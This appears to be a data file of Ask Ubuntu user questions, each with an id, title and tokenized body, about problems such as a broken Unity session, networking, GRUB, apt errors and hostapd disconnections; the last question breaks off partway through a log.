506858	failed to load session 'unity 2-d '	when logging in ubuntu 12.04 it says `` failed to load session 'unity 2-d ' '' and there is only an option to log out ... now the problem occurred when i was fixing a simple medibuntu problem , after some exploring i came down to simply removing the leftover medibuntu repositories ... but , unfortunately i also followed the instructions from this answer how to remove medibuntu repository and packages ? , mainly i ran this code suggested in the answer : pkgs= $ ( dpkg -l | awk ' { print $ 2 } ' | grep -e aacgain -e aacplusenc -e acroread-fonts -e alsa-firmware -e app-install-data-medibuntu -e apport-hooks-medibuntu -e hot-babe -e ices -e libavcodec-extra-53 -e libavdevice-extra-53 -e libav-extra-dbg -e libavfilter-extra-2 -e libavformat-extra-53 -e libavutil-extra-51 -e libdvdcss2 -e libdvdcss-dev -e libpostproc-extra-52 -e libswscale-extra-2 -e medibuntu-keyring -e mencoder -e mplayer-dbg -e mplayer-doc -e mplayer-gui -e mplayer -e non-free-codecs -e rmconverter -e w32codecs -e w64codecs | tr '\n ' ' ' ) ; sudo apt-get purge $ pkgs after that , the computer was switched off , and got the before mentioned error next time it turned on . also , there is no other session available to choose from ! only the back button ... can all of the removed software be re-installed ? how can i repair this ?
506860	networks not working after 14.04 install	installed 14.04 on a dell inspiron 1721 that is running windows vista home parallel . the wired and wireless network works fine in vista but in ubuntu it does n't detect any network connections . i am new to the ubuntu/linux environment and from some of the suggestions it mentions to use sudo but when i try it asks for a password and then wo n't allow any key strikes to work just the enter key . someone enlighten this ubuntu greeny so that i can enjoy and learn more into this world . ok , the sudo situation has been resolved but now i still have no network devices available so i ca n't even do any updates . i am a sponge here for the knowledge on how to fix this probably simple fix .
506862	connect vm directly to external network in openstack	i have installed openstack using maas and juju on ubuntu 14.04 machines . i am using neutron openstack for networking which is installed on a vm . i can assign a floating ip to vm and ping it . however , i can not ping or access the vm if i connect it directly to external network ( not through the router ) .an idea if this scenario is supported ? and what could be the problem ? another problem is that the floating ip works with vm that has 10.04 os , and it does not work if the vm instance has 14.04 . usually if i ping it i get destination host unreachable '' reply from 172.16.0.238 : destination host unreachable '' . what i could not understand is that the ip 172.16.0.238 is for the vm , so how does it reply by `` destination host unreachable '' thank you for help
506866	installing a vpn	i use expattelly.com on my current pc and am worried that if i install ubuntu that i will lose this vpn given to me to use it or not be able to re install it . i live in the cayman islands and like to access bbciplayer but can only do this with my vpn . can you assure me that i can still do this ?
506867	what causes grub errors ?	environment : ubuntu 12.04 minimal + nvidia graphics card we have about 200 almost identical machines running at various customer sites . typically , the machine is turned on in the morning and turned off in the evening . while the machine is up , all it does is to continuously display some mp4 files for the whole day . in the past couple of months , quite a few sites have reported grub errors when the machine is turned on . it goes into grub rescue editor automatically . i am wondering what could cause such a grub error . i can not imagine the os or the media player messing up the grub system . it probably is not the os because , once a machine is in the field , no one is allowed to upgrade the bios or the os . as i understand , upgrade is the only time when the grub system is touched . i do n't think the media player can damage the grub system as the player runs under non-sudo privileges . i am thinking it is more of a hardware issue . perhaps the operators just shut the power off instead of running proper `` shutdown '' procedure . is this even a possibility on ssd disks ? i would appreciate your thoughts on what you think is the most likely culprit . regards , peter
506870	will 14.04.1 work with dell dimension 3100 ?	i found this wiki page ( https : //wiki.ubuntu.com/hardwaresupportmachinesdesktopsdell ) helpfully letting me know that i could install ubu 7.10 on the dell dimension 3100 , but i 'd like to know whether the computer will work with ubuntu 14.04.1 . my mom 's running xp and it 's not feasible to upgrade her to a later ms os . thanks for your time !
506871	how can i remove gnome shell	i recently installed ubuntu 14.04 from scratch and soon after decided to try out the gnome 3 shell , which i installed from the official repos . however , it seems to conflict with unity . indeed , after logging back into unity , i noticed that the desktop would no longer accept icons , nor would it match my chosen wallpaper correctly . i seem to have fixed that by changing an option in dconf-editor , but i am not really sure what i did is right . i also have reverted to the correct plymouth theme , which had been overriden -- still , gnome 's plymouth theme has a higher priority . finally , i completely removed gnome-shell and ubuntu-gnome-desktop , but some other issues remain . it seems gnome shell overwrote unity 's defaults . one thing i noticed was the font -- instead of being the ubuntu font , it had switched to cantarell . i fixed that , but cantarell is still marked as default . how can i remove all of gnome shell remnants ?
506872	can i set up wifi using netgear	i have a n300 wireless usb adapter , can i set this up on my computer ? do i need to hook it up to a wired connection and install something ?
506873	vlc - how to browse files without stopping playing music ?	as this ca n't be the default vlc behaviour , i think it is an ubuntu question and not a vlc question : when i want to browse my music files , while there is a song playing , the music stops . i 'm not able to open some folder , without stopping the ongoing song . after opening a folder , the icon would change from some kind of little rectangle to a common folder icon . afterwards i can browse this folder without stopping first , which i think is the normal behaviour , and should be applied by default to all folders at program start . i had this problem in former vlc-installations , too . or maybe i am missing something important , as loading the folder structure first , or something like that .
506877	first second of audio stream cut off	whenever i play any kind of audio from any source ( vlc , kdenlive , youtube , facebook etc . ) , the first 1-2 seconds of the stream is cut off . i already tried enabling module-suspend-on-idle in the pulseaudio config , but that led to the problem described in my previous question sound does n't work after running vlc . is there any other way to fix this problem ?
506878	ca n't get upstart service to honor capabilities ( 7 )	i am developing a daemon started by upstart ( ubuntu 14.04 ) which needs to run as a non-privileged user ( for security ) , but bind privileged port 443 . i am using setcap to set the cap_net_bind_service capability for the executable ( it 's not a script ) . i am setting it in permitted , effective , and inherited sets ( setcap 'cap_net_bind_service+eip ' exec ) . i can su to the non-privileged user , and run it directly , and it works perfectly . it correctly binds the port , and /proc/pid/status shows the proper capabilities masks with 0x400 bit set . but when i start the service via upstart it does not run with the capabilities specified for the binary , and the bind ( ) fails ( eperm ) . /proc/pid/status shows capabilities masks are all 0 . any ideas ?
506879	14.04 and needs `` sudo reboot '' twice to reboot	i insalled my 14.04 freshly and added a lot of packages to fulfill my purpose . from a certain stage on , i have to type in `` sudo reboot '' twice to really get my system to reboot . after the 1st `` sudo reboot '' i do get the system warning about going down , but not more ... ..
506881	can not update software , can not install anything , can not upgrade	i can not update anything in my system . i use the terminal and this is what i get . reading package lists ... done building dependency tree reading state information ... done e : the package libnepomukutils4 needs to be reinstalled , but i ca n't find an archive for it . then i download libnepomukutils4 and try to install it but then i get this error this is a major failure of your software management system . please check for broken packager with synaptic , check the file permissions and correctness of the file /etc/apt/sources.list and reload the software information with : sudo apt-get update and sudo apt-get update -f so i open synaptic and do what it 's asking me to do but i ca n't get past this error the following errors occured e : the package libnepomukutils4 needs to be reinstalled , but i ca n't find an archive for it . e : internal error opening cache ( 1 ) . please report . contents of /etc/apt/sources.list # deb cdrom : [ lubuntu 14.04 lts _trusty tahr_ - release amd64 ( 20140416.2 ) ] / trusty main multiverse restricted universe # see http : //help.ubuntu.com/community/upgradenotes for how to upgrade to # newer versions of the distribution . deb http : //mirror.telepoint.bg/ubuntu/ trusty main restricted deb-src http : //mirror.telepoint.bg/ubuntu/ trusty main restricted # # major bug fix updates produced after the final release of the # # distribution . deb http : //mirror.telepoint.bg/ubuntu/ trusty-updates main restricted deb-src http : //mirror.telepoint.bg/ubuntu/ trusty-updates main restricted # # n.b . software from this repository is entirely unsupported by the ubuntu # # team . also , please note that software in universe will not receive any # # review or updates from the ubuntu security team . deb http : //mirror.telepoint.bg/ubuntu/ trusty universe deb-src http : //mirror.telepoint.bg/ubuntu/ trusty universe deb http : //mirror.telepoint.bg/ubuntu/ trusty-updates universe deb-src http : //mirror.telepoint.bg/ubuntu/ trusty-updates universe # # n.b . software from this repository is entirely unsupported by the ubuntu # # team , and may not be under a free licence . please satisfy yourself as to # # your rights to use the software . also , please note that software in # # multiverse will not receive any review or updates from the ubuntu # # security team . deb http : //mirror.telepoint.bg/ubuntu/ trusty multiverse deb-src http : //mirror.telepoint.bg/ubuntu/ trusty multiverse deb http : //mirror.telepoint.bg/ubuntu/ trusty-updates multiverse deb-src http : //mirror.telepoint.bg/ubuntu/ trusty-updates multiverse # # n.b . software from this repository may not have been tested as # # extensively as that contained in the main release , although it includes # # newer versions of some applications which may provide useful features . # # also , please note that software in backports will not receive any review # # or updates from the ubuntu security team . deb http : //mirror.telepoint.bg/ubuntu/ trusty-backports main restricted universe multiverse deb-src http : //mirror.telepoint.bg/ubuntu/ trusty-backports main restricted universe multiverse deb http : //mirror.telepoint.bg/ubuntu/ trusty-security main restricted deb-src http : //mirror.telepoint.bg/ubuntu/ trusty-security main restricted deb http : //mirror.telepoint.bg/ubuntu/ trusty-security universe deb-src http : //mirror.telepoint.bg/ubuntu/ trusty-security universe deb http : //mirror.telepoint.bg/ubuntu/ trusty-security multiverse deb-src http : //mirror.telepoint.bg/ubuntu/ trusty-security multiverse # # uncomment the following two lines to add software from canonical's # # 'partner ' repository . # # this software is not part of ubuntu , but is offered by canonical and the # # respective vendors as a service to ubuntu users . # deb http : //archive.canonical.com/ubuntu trusty partner # deb-src http : //archive.canonical.com/ubuntu trusty partner # # this software is not part of ubuntu , but is offered by third-party # # developers who want to ship their latest software . deb http : //extras.ubuntu.com/ubuntu trusty main
506882	dnsmasq error in syslog	i was browsing my syslog and i found this error : - networkmanager [ 984 ] : [ 1407179609.489726 ] [ nm-dns-dnsmasq.c:393 ] update ( ) : dnsmasq not available on the bus , ca n't update servers . networkmanager [ 984 ] : [ 1407179609.489790 ] [ nm-dns-dnsmasq.c:395 ] update ( ) : dnsmasq owner not found on bus : could not get owner of name 'uk.org.thekelleys.dnsmasq ' : no such name networkmanager [ 984 ] : dns : plugin dnsmasq update failed it does not seem to cause any problems to me but i wonder what it is and whether it needs any action .
506884	file name in chinese	i am new to ubuntu . i am trying to install a game which is in 2 cd 's the first disc installation went fine when prompted for the second disc it does not recognize it when checked the disc it shows the file names of second disc in chinese . although the file names should be in english as i have successfully installed the game in windows . my operating system language is english . could someone please help me on how to display the names back in english so i could complete the installation . thanks
506885	ca n't locate package ( gimp ) in terminal , and in the software center says 'not found '	i desperately need to install gimp on my computer . when i enter the ubuntu software center gimp is easily searchable , but when i click on it to download it says : `` not found : there is n't a software package called 'gimp ' in your current software sources '' . i 've tried to add the program through the terminal using sudo apt- get install gimp to which i get the response e : unable to locate package gimp i 've tried updates and changing my software settings , but nothing has helped and i ca n't find a clear fix here . if you have some advice , please share . thanks !
506886	no network connection but nameserver ok , no firewall	for two days , my laptop can not connect to the internet ( a.k.a . all machines beyond my router ) anymore . i have investigated the following things : the network access worked fine half a week ago . i have no idea , what could have caused the outage . system : ubuntu 14.04 , xfce , fully patched i can access just fine the router 's web interface and even other machines in my home net i can not reach any server outside , neither by name nor by ip . i added google 's 8.8.8.8 as dns resolver , no change ( no surprise after finding 5 ... ) ufw is disabled : $ sudo ufw status warn : doppeltes profil 'apache ' , zuletzt gefundenes wird verwendet warn : doppeltes profil 'apache secure ' , zuletzt gefundenes wird verwendet warn : doppeltes profil 'apache full ' , zuletzt gefundenes wird verwendet status : inaktiv iptables have no strange entries : $ sudo iptables-save *filter : input accept [ 240:30526 ] : forward accept [ 0:0 ] : output accept [ 2994769:4696400653 ] commit i checked with the router , there is no active firewall there . also all other computers , each running ubuntu , can connect to the net just fine . there 's no difference between eth0 and wlan0 , both do not work . ifconfig output : $ ifconfig eth0 link encap : ethernet hwaddr 00:17 : a4 : e8:2a:9c up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) interrupt:18 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:229 errors:0 dropped:0 overruns:0 frame:0 tx packets:229 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:30871 ( 30.8 kb ) tx bytes:30871 ( 30.8 kb ) tun0 link encap : unspec hwaddr 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00 inet addr:10.8.0.6 p-t-p:10.8.0.5 mask:255.255.255.255 up pointopoint running noarp multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:100 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) wlan0 link encap : ethernet hwaddr 00:1b:77:34:2f:09 inet addr:192.168.178.23 bcast:192.168.178.255 mask:255.255.255.0 inet6 addr : fe80 : :21b:77ff : fe34:2f09/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:188 errors:0 dropped:0 overruns:0 frame:0 tx packets:262 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:27175 ( 27.1 kb ) tx bytes:35542 ( 35.5 kb ) output of route -n : $ route -n kernel ip routing table destination gateway genmask flags metric ref use iface 0.0.0.0 10.8.0.5 128.0.0.0 ug 0 0 0 tun0 0.0.0.0 192.168.178.1 0.0.0.0 ug 0 0 0 wlan0 10.0.0.0 10.8.0.5 255.255.255.0 ug 0 0 0 tun0 10.8.0.1 10.8.0.5 255.255.255.255 ugh 0 0 0 tun0 10.8.0.5 0.0.0.0 255.255.255.255 uh 0 0 0 tun0 128.0.0.0 10.8.0.5 128.0.0.0 ug 0 0 0 tun0 188.192.138.205 192.168.178.1 255.255.255.255 ugh 0 0 0 wlan0 192.168.178.0 0.0.0.0 255.255.255.0 u 9 0 0 wlan0 i am basically at my wits ' end now . what can i try to bring the laptop back to connecting to the 'net ? any diagnosis data that you need will be given with pleasure .
506887	ubuntu and windows dual-booted no battery warning on windows	sorry if this may be of topic . i got windows 8.1 and ubuntu dual-booted on my asus x550ca . whenever i 'm booted in to windows while i am on battery power there is no low battery warning warning . it was just fine before installing ubuntu . it just shuts down at about 10 % . i set it to sleep at 5 % but it just shuts down . how do i solve this ? here is a picture of my battery settings on ubuntu
506889	how do you set up a systemwide read only user for a security scanner	i 'm hoping to play with stealth https : //apps.ubuntu.com/cat/applications/precise/stealth/ it suggests the creation of a read only access user that the integrity scanner can use to access its target machine to scan . how would one create a user with this kind of privileges .
506891	14.04 and grub hanging after reboot	i almost tried every combination of grub parameters in /etc/default/grub but still my systems hangs in the grub menu after a reboot . boot from power off works properly . this is my current grub.conf : grub_default= '' 0 # saved '' grub_hidden_timeout= '' 10 '' grub_savedefault= '' true '' grub_hidden_timeout_quiet= '' false '' grub_timeout= '' 10 '' grub_distributor= '' `lsb_release -i -s 2 > /dev/null || echo debian` '' grub_cmdline_linux_default= '' quiet splash '' grub_cmdline_linux= '' reboot=efi '' grub_recordfail_timeout= '' $ grub_timeout '' grub_init_tune= '' 480 440 1 '' enter code here i did a sudo update-grub afterwards but somehow it even looks like grub is ignoring any changes ( as it just keeps on hanging after reboot ) . any idea ?
506892	installation woes - dual boot not booting into ubuntu on win7 x64 laptop with esi	sorry , this is a relatively common overall story but i can not find a solution that works for my system hence asking . i am an experienced linux user but i seldom install . have win7 laptop which has esi ( win7 sp1 x64 ) and some recovery nonsense partitions . i shrank win7 partition then in ubuntu ( latest version as of 01 aug 14 ) installer , i added the appropriate partitions using manual option and put boot loader in what i thought was usual place ( at this point i 'd kind of forgotten it was n't bios ) . bios is currently in legacy as esi does n't work and legacy at least lets me into win7 partition . i ca n't get ubuntu to boot at all - boot menu ( win ) gives me all manner of errors . i have added grub2 through easybcd which i 've done before and it usually works first time ... i now realize esi is the problem . i then ran boot-repair from livedisk and found the 'package manager ' error that many people seem to report on here but few seem to have a solution for - i had nothing open and no updates blah blah blah . bottom line : what do i need to do to get this dual boot working ? i can not reinstall windows ( long story ) so my only options revolve around ubuntu . i 've deleted and reinstalled it 4 times now and tried boot thingy pointing to different places to no avail . here is the dump from boot-repair : http : //paste.ubuntu.com/7955029/ it looks a bit of a mess ... ! sorry ! any help you can give would be amazing . thanks r
506896	how can i add a parameter on module at startup ?	i 'm using lubuntu 14.04 with an usb wifi adapter ( rtl8192 ) and it use module rtl8192cu.ko i had a problem of dropping connection now and then . i fix my problem using these parameters : rtw_power_mgnt=2 rtw_ips_mode=1 rtw_hwpwrp_detect=1 rtw_enusbss=1 but now every time i boot i need to : sudo rmmod rtl8192cu.ko sudo insmod rtl8192cu.ko rtw_power_mgnt=2 rtw_ips_mode=1 rtw_hwpwrp_detect=1 rtw_enusbss=1` this gets really annoying . i 'd like it to load at startup by itself . but how ?
506901	ubuntu 14.04 running well on intel integrated graphics , is it worth trying nvidia graphics ?	i am new to linux and to the community . i recently installed ubuntu in my system and i am already in love with it . my question is , as my system came with a dedicated nvidia graphics card installed in it , so do i really need to install the driver for it ? because my system is doing good so far and in the details section it only shows the intel graphics , which is the integrated one i guess . as far as i know there are n't much high-end games for ubuntu that requires a dedicated graphics card , so will it be worth installing a graphics driver for it ? thanks .
506903	restore audio in skype 4.3 on ubuntu 12.04 64-bit + cinnamon 2.0.14	i just noticed that my audio is no longer working in the newest version of skype ( 4.3 ) ( i got the `` error '' 'virtual device ' for microphone speakers , and ringing ) . i understood that the problem might be that i do not have libpulse0 : i386 ( i am on 64-bit ) . as such i tried to install libpulse0 : i386 , but then i also need to install libjson0 : i386 . the installation of libjson0 : i386 will remove cinnamon from my machine ( i am using 2.0.14 on ubuntu 12.04 lts 64-bit ) . is there a way to have a working skype without having to give up cinnamon ( 2.0.14 ) ?
506904	hostapd seems to be dropping connections after ~24h ( intel 7260ac )	i 'm basically trying to set up a linux router , with a wireless access point bridged with the wired network . the access point stays up for some time ( usually 24 hours or so ) and then all clients disconnect and ca n't reconnect until i reset hostapd . i ran hostapd in just -d mode and it seems it disconnects after `` wlan0 wpa rekeying gtk '' is unsuccessful . here is the log from when it fails : wlan0 : wpa rekeying gtk wpa : group state machine entering state setkeys ( vlan-id 0 ) gtk - hexdump ( len=32 ) : [ removed ] wpa : 28:10:7b:1e:30:96 wpa_ptk_group entering state rekeynegotiating wlan0 : sta 28:10:7b:1e:30:96 wpa : sending 1/2 msg of group key handshake wpa : send eapol ( version=2 secure=1 mic=1 ack=1 install=0 pairwise=0 kde_len=40 keyidx=1 encr=1 ) plaintext eapol-key key data - hexdump ( len=48 ) : [ removed ] wpa : use eapol-key timeout of 500 ms ( retry counter 1 ) wpa : 28:10:7b:1e:18:08 wpa_ptk_group entering state rekeynegotiating wlan0 : sta 28:10:7b:1e:18:08 wpa : sending 1/2 msg of group key handshake wpa : send eapol ( version=2 secure=1 mic=1 ack=1 install=0 pairwise=0 kde_len=40 keyidx=1 encr=1 ) plaintext eapol-key key data - hexdump ( len=48 ) : [ removed ] wpa : use eapol-key timeout of 500 ms ( retry counter 1 ) wpa : 00:26:82 : c6:15:72 wpa_ptk_group entering state rekeynegotiating wlan0 : sta 00:26:82 : c6:15:72 wpa : sending 1/2 msg of group key handshake wpa : send eapol ( version=2 secure=1 mic=1 ack=1 install=0 pairwise=0 kde_len=40 keyidx=1 encr=1 ) plaintext eapol-key key data - hexdump ( len=48 ) : [ removed ] wpa : use eapol-key timeout of 500 ms ( retry counter 1 ) wpa_group_setkeys : gkeydonestations=3 wlan0 : sta 28:10:7b:1e:30:96 wpa : eapol-key timeout wpa : 28:10:7b:1e:30:96 wpa_ptk_group entering state rekeynegotiating wlan0 : sta 28:10:7b:1e:30:96 wpa : sending 1/2 msg of group key handshake wpa : send eapol ( version=2 secure=1 mic=1 ack=1 install=0 pairwise=0 kde_len=40 keyidx=1 encr=1 ) plaintext eapol-key key data - hexdump ( len=48 ) : [ removed ] wpa : use eapol-key timeout of 1000 ms ( retry counter 2 ) wlan0 : sta 28:10:7b:1e:18:08 wpa : eapol-key timeout wpa : 28:10:7b:1e:18:08 wpa_ptk_group entering state rekeynegotiating wlan0 : sta 28:10:7b:1e:18:08 wpa : sending 1/2 msg of group key handshake wpa : send eapol ( version=2 secure=1 mic=1 ack=1 install=0 pairwise=0 kde_len=40 keyidx=1 encr=1 ) plaintext eapol-key key data - hexdump ( len=48 ) : [ removed ] wpa : use eapol-key timeout of 1000 ms ( retry counter 2 ) wlan0 : sta 00:26:82 : c6:15:72 wpa : eapol-key timeout wpa : 00:26:82 : c6:15:72 wpa_ptk_group entering state rekeynegotiating wlan0 : sta 00:26:82 : c6:15:72 wpa : sending 1/2 msg of group key handshake wpa : send eapol ( version=2 secure=1 mic=1 ack=1 install=0 pairwise=0 kde_len=40 keyidx=1 encr=1 ) plaintext eapol-key key data - hexdump ( len=48 ) : [ removed ] wpa : use eapol-key timeout of 1000 ms ( retry counter 2 ) wlan0 : sta 28:10:7b:1e:30:96 wpa : eapol-key timeout wpa : 28:10:7b:1e:30:96 wpa_ptk_group entering state rekeynegotiating wlan0 : sta 28:10:7b:1e:30:96 wpa : sending 1/2 msg of group key handshake wpa : send eapol ( version=2 secure=1 mic=1 ack=1 install=0 pairwise=0 kde_len=40 keyidx=1 encr=1 ) plaintext eapol-key key data - hexdump ( len=48 ) : [ removed ] wpa : use eapol-key timeout of 1000 ms ( retry counter 3 ) wlan0 : sta 28:10:7b:1e:18:08 wpa : eapol-key timeout wpa : 28:10:7b:1e:18:08 wpa_ptk_group entering state rekeynegotiating wlan0 : sta 28:10:7b:1e:18:08 wpa : sending 1/2 msg of group key handshake wpa : send eapol ( version=2 secure=1 mic=1 ack=1 install=0 pairwise=0 kde_len=40 keyidx=1 encr=1 ) plaintext eapol-key key data - hexdump ( len=48 ) : [ removed ] wpa : use eapol-key timeout of 1000 ms ( retry counter 3 ) wlan0 : sta 00:26:82 : c6:15:72 wpa : eapol-key timeout wpa : 00:26:82 : c6:15:72 wpa_ptk_group entering state rekeynegotiating wlan0 : sta 00:26:82 : c6:15:72 wpa : sending 1/2 msg of group key handshake wpa : send eapol ( version=2 secure=1 mic=1 ack=1 install=0 pairwise=0 kde_len=40 keyidx=1 encr=1 ) plaintext eapol-key key data - hexdump ( len=48 ) : [ removed ] wpa : use eapol-key timeout of 1000 ms ( retry counter 3 ) wlan0 : sta 28:10:7b:1e:30:96 wpa : eapol-key timeout wpa : 28:10:7b:1e:30:96 wpa_ptk_group entering state rekeynegotiating wlan0 : sta 28:10:7b:1e:30:96 wpa : sending 1/2 msg of group key handshake wpa : send eapol ( version=2 secure=1 mic=1 ack=1 install=0 pairwise=0 kde_len=40 keyidx=1 encr=1 ) plaintext eapol-key key data - hexdump ( len=48 ) : [ removed ] wpa : use eapol-key timeout of 1000 ms ( retry counter 4 ) wlan0 : sta 28:10:7b:1e:18:08 wpa : eapol-key timeout wpa : 28:10:7b:1e:18:08 wpa_ptk_group entering state rekeynegotiating wlan0 : sta 28:10:7b:1e:18:08 wpa : sending 1/2 msg of group key handshake wpa : send eapol ( version=2 secure=1 mic=1 ack=1 install=0 pairwise=0 kde_len=40 keyidx=1 encr=1 ) plaintext eapol-key key data - hexdump ( len=48 ) : [ removed ] wpa : use eapol-key timeout of 1000 ms ( retry counter 4 ) wlan0 : sta 00:26:82 : c6:15:72 wpa : eapol-key timeout wpa : 00:26:82 : c6:15:72 wpa_ptk_group entering state rekeynegotiating wlan0 : sta 00:26:82 : c6:15:72 wpa : sending 1/2 msg of group key handshake wpa : send eapol ( version=2 secure=1 mic=1 ack=1 install=0 pairwise=0 kde_len=40 keyidx=1 encr=1 ) plaintext eapol-key key data - hexdump ( len=48 ) : [ removed ] wpa : use eapol-key timeout of 1000 ms ( retry counter 4 ) wlan0 : sta 28:10:7b:1e:30:96 wpa : eapol-key timeout wpa : 28:10:7b:1e:30:96 wpa_ptk_group entering state rekeynegotiating wpa : 28:10:7b:1e:30:96 wpa_ptk_group entering state keyerror wlan0 : sta 28:10:7b:1e:30:96 wpa : wpa_ptk : sm- > disconnect wpa : 28:10:7b:1e:30:96 wpa_ptk entering state disconnect wpa_sta_disconnect sta 28:10:7b:1e:30:96 hostapd_wpa_auth_disconnect : wpa authenticator requests disconnect : sta 28:10:7b:1e:30:96 reason 2 nl80211 : send_mlme - noack=0 freq=0 no_cck=0 offchanok=0 wait_time=0 fc=0xc0 nlmode=3 nl80211 : send_mlme - > send_frame nl80211 : send_frame - use bss- > freq=2427 nl80211 : send_frame - > send_frame_cmd wlan0 : ap-sta-disconnected 28:10:7b:1e:30:96 wlan0 : sta 28:10:7b:1e:30:96 wpa : event 3 notification wpa_driver_nl80211_set_key : ifindex=4 ( wlan0 ) alg=0 addr=0xc747f0 key_idx=0 set_tx=1 seq_len=0 key_len=0 addr=28:10:7b:1e:30:96 wpa : wpa_sm_step ( ) called recursively ap_sta_disconnect : reschedule ap_handle_timer timeout for 28:10:7b:1e:30:96 ( 5 seconds - ap_max_inactivity_after_deauth ) wpa : 28:10:7b:1e:30:96 wpa_ptk_group entering state idle wpa : 28:10:7b:1e:30:96 wpa_ptk entering state disconnected wpa : 28:10:7b:1e:30:96 wpa_ptk entering state initialize wpa_driver_nl80211_set_key : ifindex=4 ( wlan0 ) alg=0 addr=0xc747f0 key_idx=0 set_tx=1 seq_len=0 key_len=0 addr=28:10:7b:1e:30:96 wlan0 : sta 28:10:7b:1e:30:96 ieee 802.1x : unauthorizing port wlan0 : sta 28:10:7b:1e:18:08 wpa : eapol-key timeout wpa : 28:10:7b:1e:18:08 wpa_ptk_group entering state rekeynegotiating wpa : 28:10:7b:1e:18:08 wpa_ptk_group entering state keyerror wlan0 : sta 28:10:7b:1e:18:08 wpa : wpa_ptk : sm- > disconnect wpa : 28:10:7b:1e:18:08 wpa_ptk entering state disconnect wpa_sta_disconnect sta 28:10:7b:1e:18:08 hostapd_wpa_auth_disconnect : wpa authenticator requests disconnect : sta 28:10:7b:1e:18:08 reason 2 nl80211 : send_mlme - noack=0 freq=0 no_cck=0 offchanok=0 wait_time=0 fc=0xc0 nlmode=3 nl80211 : send_mlme - > send_frame nl80211 : send_frame - use bss- > freq=2427 nl80211 : send_frame - > send_frame_cmd wlan0 : ap-sta-disconnected 28:10:7b:1e:18:08 wlan0 : sta 28:10:7b:1e:18:08 wpa : event 3 notification wpa_driver_nl80211_set_key : ifindex=4 ( wlan0 ) alg=0 addr=0xc745f0 key_idx=0 set_tx=1 seq_len=0 key_len=0 addr=28:10:7b:1e:18:08 wpa : wpa_sm_step ( ) called recursively ap_sta_disconnect : reschedule ap_handle_timer timeout for 28:10:7b:1e:18:08 ( 5 seconds - ap_max_inactivity_after_deauth ) wpa : 28:10:7b:1e:18:08 wpa_ptk_group entering state idle wpa : 28:10:7b:1e:18:08 wpa_ptk entering state disconnected wpa : 28:10:7b:1e:18:08 wpa_ptk entering state initialize wpa_driver_nl80211_set_key : ifindex=4 ( wlan0 ) alg=0 addr=0xc745f0 key_idx=0 set_tx=1 seq_len=0 key_len=0 addr=28:10:7b:1e:18:08 wlan0 : sta 28:10:7b:1e:18:08 ieee 802.1x : unauthorizing port wlan0 : sta 00:26:82 : c6:15:72 wpa : eapol-key timeout wpa : 00:26:82 : c6:15:72 wpa_ptk_group entering state rekeynegotiating wpa : 00:26:82 : c6:15:72 wpa_ptk_group entering state keyerror wpa : group state machine entering state setkeysdone ( vlan-id 0 ) wpa_driver_nl80211_set_key : ifindex=4 ( wlan0 ) alg=2 addr=0x461492 key_idx=1 set_tx=1 seq_len=0 key_len=32 nl80211 : key_data - hexdump ( len=32 ) : [ removed ] broadcast key wlan0 : sta 00:26:82 : c6:15:72 wpa : wpa_ptk : sm- > disconnect wpa : 00:26:82 : c6:15:72 wpa_ptk entering state disconnect wpa_sta_disconnect sta 00:26:82 : c6:15:72 hostapd_wpa_auth_disconnect : wpa authenticator requests disconnect : sta 00:26:82 : c6:15:72 reason 2 nl80211 : send_mlme - noack=0 freq=0 no_cck=0 offchanok=0 wait_time=0 fc=0xc0 nlmode=3 nl80211 : send_mlme - > send_frame nl80211 : send_frame - use bss- > freq=2427 nl80211 : send_frame - > send_frame_cmd wlan0 : ap-sta-disconnected 00:26:82 : c6:15:72 wlan0 : sta 00:26:82 : c6:15:72 wpa : event 3 notification wpa_driver_nl80211_set_key : ifindex=4 ( wlan0 ) alg=0 addr=0xc73fc0 key_idx=0 set_tx=1 seq_len=0 key_len=0 addr=00:26:82 : c6:15:72 wpa : wpa_sm_step ( ) called recursively ap_sta_disconnect : reschedule ap_handle_timer timeout for 00:26:82 : c6:15:72 ( 5 seconds - ap_max_inactivity_after_deauth ) wpa : 00:26:82 : c6:15:72 wpa_ptk_group entering state idle wpa : 00:26:82 : c6:15:72 wpa_ptk entering state disconnected wpa : 00:26:82 : c6:15:72 wpa_ptk entering state initialize wpa_driver_nl80211_set_key : ifindex=4 ( wlan0 ) alg=0 addr=0xc73fc0 key_idx=0 set_tx=1 seq_len=0 key_len=0 addr=00:26:82 : c6:15:72 wlan0 : sta 00:26:82 : c6:15:72 ieee 802.1x : unauthorizing port removing sta 28:10:7b:1e:30:96 from kernel driver nl80211 : sta_remove - > del_station wlan0 28:10:7b:1e:30:96 -- > 0 ( success ) wlan0 : sta 28:10:7b:1e:30:96 mlme : mlme-deauthenticate.indication ( 28:10:7b:1e:30:96 , 2 ) wlan0 : sta 28:10:7b:1e:30:96 mlme : mlme-deletekeys.request ( 28:10:7b:1e:30:96 ) wpa_driver_nl80211_set_key : ifindex=4 ( wlan0 ) alg=0 addr=0xc747f0 key_idx=0 set_tx=1 seq_len=0 key_len=0 addr=28:10:7b:1e:30:96 removing sta 28:10:7b:1e:18:08 from kernel driver nl80211 : sta_remove - > del_station wlan0 28:10:7b:1e:18:08 -- > 0 ( success ) wlan0 : sta 28:10:7b:1e:18:08 mlme : mlme-deauthenticate.indication ( 28:10:7b:1e:18:08 , 2 ) wlan0 : sta 28:10:7b:1e:18:08 mlme : mlme-deletekeys.request ( 28:10:7b:1e:18:08 ) wpa_driver_nl80211_set_key : ifindex=4 ( wlan0 ) alg=0 addr=0xc745f0 key_idx=0 set_tx=1 seq_len=0 key_len=0 addr=28:10:7b:1e:18:08 nl80211 : drv event 20 ( nl80211_cmd_del_station ) received for wlan0 nl80211 : delete station 28:10:7b:1e:30:96 removing sta 00:26:82 : c6:15:72 from kernel driver nl80211 